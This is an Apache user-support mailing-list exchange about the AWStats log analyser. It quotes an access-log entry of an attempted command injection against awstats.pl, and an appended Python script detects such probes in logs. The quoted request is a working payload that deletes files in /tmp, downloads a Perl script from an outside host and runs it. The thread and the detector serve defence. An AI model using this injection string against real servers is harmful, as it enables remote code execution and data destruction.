On 11/12/05, David P. Donahue <ddonahue@xxxxxxxxxxx> wrote:
> > http://awstats.sourceforge.net/
>
> Looks good. One thing that concerns me, though. The name sounded
> familiar because of some attempts made on my web server from time to
> time. I notice entries like the following in my logs (sorry for any
> wrapping):
>
> host-216-153-162-21.pro.choiceone.net - - [13/Sep/2005:10:52:04 -0400]
> "GET
> /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/h4x000r/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
> HTTP/1.1" 404 12682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>
> On one such occasion I even went and downloaded the PERL script to which
> it links and looked through the code. Pretty unsettling. As with any
> service, security is always a concern. But it concerned me that attacks
> were being directed at this awstats package.
>
> Is there anything I should know before just loading it up and running it?

Awstats works well. If you have concerns about security, just don't use
the cgi interface. Have a cron job build static reports.

Krist

--
krist.vanbesien@xxxxxxxxx
Solothurn, Switzerland

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
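
Added example, not part of the original thread: a small access-log check for the kind of `awstats.pl` probe quoted above, which flags requests whose URL-decoded query string carries shell metacharacters and separates 404s (script not installed) from hits the script actually answered. The sample log lines, addresses and the function name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# Shell metacharacters that a legitimate awstats.pl query string does not need.
SHELL_META = re.compile(r"[|;`$<>]")

# Constructed sample lines (documentation addresses, harmless payloads).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Sep/2005:10:52:04 -0400] '
    '"GET /awstats/awstats.pl?configdir=|echo%20;echo%20test;echo| HTTP/1.1" '
    '404 12682 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [13/Sep/2005:11:00:00 -0400] '
    '"GET /awstats/awstats.pl?config=example.org&output=main HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Sep/2005:11:05:12 -0400] '
    '"GET /cgi-bin/awstats.pl?configdir=%7Cecho%20test%3B HTTP/1.1" '
    '200 512 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [13/Sep/2005:11:06:00 -0400] '
    '"GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

def suspicious_awstats_hits(lines):
    """Return (host, time, status, decoded_query) for awstats.pl requests whose
    URL-decoded query string contains shell metacharacters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        if not path.lower().endswith("/awstats.pl"):
            continue
        decoded = unquote(query)  # catches %7C / %3B encoded variants as well
        if SHELL_META.search(decoded):
            hits.append((m["host"], m["time"], int(m["status"]), decoded))
    return hits

if __name__ == "__main__":
    for host, when, status, query in suspicious_awstats_hits(SAMPLE_LOG):
        # A 404 means the script was not there; anything else needs a closer look.
        verdict = "script not present" if status == 404 else "REVIEW: script answered"
        print(f"{when} {host} {status} {verdict}: {query}")
```

With the CGI interface removed and reports built statically, as suggested in the reply, every such request should show up as a 404.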